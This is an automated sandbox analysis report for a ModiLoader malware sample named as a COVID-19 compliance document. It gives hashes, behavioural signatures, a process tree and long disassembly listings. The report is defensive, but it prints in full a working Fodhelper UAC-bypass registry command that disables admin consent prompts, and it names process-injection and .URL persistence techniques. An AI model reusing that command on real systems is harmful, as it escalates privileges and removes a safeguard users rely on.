Loading ...

Play interactive tourEdit tour

Analysis Report Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe

Overview

General Information

Sample Name:Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe
Analysis ID:294445
MD5:bf1d56457c41d52ccfdf550e31282732
SHA1:fda35ca446867fe06cd7083872b3727afa29bd85
SHA256:8f3b6a725b06abd223aa214244ba4756cba52419dd116506744c386133a805fe
Tags:exeModiLoader

Most interesting Screenshot:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Fodhelper UAC Bypass
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Writes to foreign memory regions
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

Startup

  • System is w10x64
  • Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe (PID: 5852 cmdline: 'C:\Users\user\Desktop\Customer_Report for COVID-19 Non-Complaince. Doc_32112.exe' MD5: BF1D56457C41D52CCFDF550E31282732)
    • notepad.exe (PID: 1476 cmdline: C:\Windows\System32\Notepad.exe MD5: D693F13FE3AA2010B854C4C60671B8E2)
      • cmd.exe (PID: 3152 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 6980 cmdline: REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • cmd.exe (PID: 3788 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ieinstal.exe (PID: 6032 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
  • Xbuhnek.exe (PID: 5448 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe' MD5: BF1D56457C41D52CCFDF550E31282732)
  • Xbuhnek.exe (PID: 5488 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe' MD5: BF1D56457C41D52CCFDF550E31282732)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\hubX.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x9b:$hotkey: \x0AHotKey=1
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\hubX.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\hubX.urlMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x70:$icon: IconFile=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.709710666.0000000002A74000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x187c:$file: URL=
  • 0x1860:$url_explicit: [InternetShortcut]
00000000.00000003.709710666.0000000002A74000.00000004.00000001.sdmpMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x18a8:$icon: IconFile=
  • 0x1860:$url_explicit: [InternetShortcut]
00000000.00000003.707937961.0000000002A74000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x11c0:$file: URL=
  • 0x11a4:$url_explicit: [InternetShortcut]
00000000.00000003.707937961.0000000002A74000.00000004.00000001.sdmpMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x11ec:$icon: IconFile=
  • 0x11a4:$url_explicit: [InternetShortcut]
00000000.00000003.710515160.0000000002A74000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x1c04:$file: URL=
  • 0x1be8:$url_explicit: [InternetShortcut]
Click to see the 20 entries

Sigma Overview

System Summary:

barindex
Sigma detected: Fodhelper UAC BypassShow sources
Source: Process startedAuthor: Joe Security: Data: Command: REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f, CommandLine: REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f, CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3152, ProcessCommandLine: REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f, ProcessId: 6980

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeMetadefender: Detection: 18%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: Customer_Report for COVID-19 Non-Complaince. Doc_32112.exeMetadefender: Detection: 18%Perma Link
Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_5048518C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,6_2_5048518C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-18h]14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-04h]14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea ecx, dword ptr [ebp-08h]14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-1Ch]14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-10h]14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, ebx14_3_023F02A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-04h], 00000000h14_3_023F02A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then push 00000000h14_3_023F02A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-08h], 00000000h14_3_023F02A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]14_3_023F02A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, ebx14_3_023F02A6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-04h], 00000000h14_3_023F02A6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then push 00000000h14_3_023F02A6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-08h], 00000000h14_3_023F02A6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-18h]14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-04h]14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea ecx, dword ptr [ebp-08h]14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-1Ch]14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-10h]14_3_023FAAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 20h14_3_023EFB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 00000080h14_3_023EFB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 10h14_3_023EFB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 04h14_3_023EFB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 02h14_3_023EFB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 08h14_3_023EFB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 01h14_3_023EFB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, ebx14_3_023FA8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-04h], 00000000h14_3_023FA8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then push 00000000h14_3_023FA8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-08h], 00000000h14_3_023FA8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]14_3_023FA8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, ebx14_3_023FA8C6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-04h], 00000000h14_3_023FA8C6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then push 00000000h14_3_023FA8C6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-08h], 00000000h14_3_023FA8C6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 20h14_3_023FA190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 00000080h14_3_023FA190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 10h14_3_023FA190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 04h14_3_023FA190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 02h14_3_023FA190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 08h14_3_023FA190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 01h14_3_023FA190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-18h]14_3_023F049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-04h]14_3_023F049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]14_3_023F049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]14_3_023F049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-1Ch]14_3_023F049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-10h]14_3_023F049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-18h]14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-04h]14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea ecx, dword ptr [ebp-08h]14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-1Ch]14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-10h]14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-18h]14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-04h]14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea ecx, dword ptr [ebp-08h]14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-1Ch]14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-10h]14_3_023F048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, ebx14_3_023E0B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-04h], 00000000h14_3_023E0B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then push 00000000h14_3_023E0B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-08h], 00000000h14_3_023E0B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]14_3_023E0B44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, ebx14_3_023E0B42
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-04h], 00000000h14_3_023E0B42
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then push 00000000h14_3_023E0B42
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-08h], 00000000h14_3_023E0B42
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 20h14_3_023E040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 00000080h14_3_023E040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 10h14_3_023E040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 04h14_3_023E040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 02h14_3_023E040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 08h14_3_023E040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 01h14_3_023E040C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-18h]14_3_023E0D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-04h]14_3_023E0D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]14_3_023E0D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]14_3_023E0D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea ecx, dword ptr [ebp-08h]14_3_023E0D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]14_3_023E0D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-1Ch]14_3_023E0D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-10h]14_3_023E0D28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, ebx15_3_024102A6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-04h], 00000000h15_3_024102A6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then push 00000000h15_3_024102A6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-08h], 00000000h15_3_024102A6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, ebx15_3_024102A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-04h], 00000000h15_3_024102A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then push 00000000h15_3_024102A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-08h], 00000000h15_3_024102A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]15_3_024102A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-18h]15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-04h]15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea ecx, dword ptr [ebp-08h]15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-1Ch]15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-10h]15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 20h15_3_0240FB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 00000080h15_3_0240FB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 10h15_3_0240FB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 04h15_3_0240FB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 02h15_3_0240FB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 08h15_3_0240FB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 01h15_3_0240FB70
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-18h]15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-04h]15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea ecx, dword ptr [ebp-08h]15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-1Ch]15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-10h]15_3_0241AAAC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, ebx15_3_0241A8C6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-04h], 00000000h15_3_0241A8C6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then push 00000000h15_3_0241A8C6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-08h], 00000000h15_3_0241A8C6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, ebx15_3_0241A8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-04h], 00000000h15_3_0241A8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then push 00000000h15_3_0241A8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then cmp dword ptr [ebp-08h], 00000000h15_3_0241A8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]15_3_0241A8C8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 20h15_3_0241A190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 00000080h15_3_0241A190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 10h15_3_0241A190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 04h15_3_0241A190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 02h15_3_0241A190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 08h15_3_0241A190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then or edx, 01h15_3_0241A190
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-18h]15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-04h]15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea ecx, dword ptr [ebp-08h]15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-0Ch]15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-1Ch]15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-10h]15_3_0241048C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea edx, dword ptr [ebp-18h]15_3_0241049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then lea eax, dword ptr [ebp-04h]15_3_0241049C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]15_3_0241049C
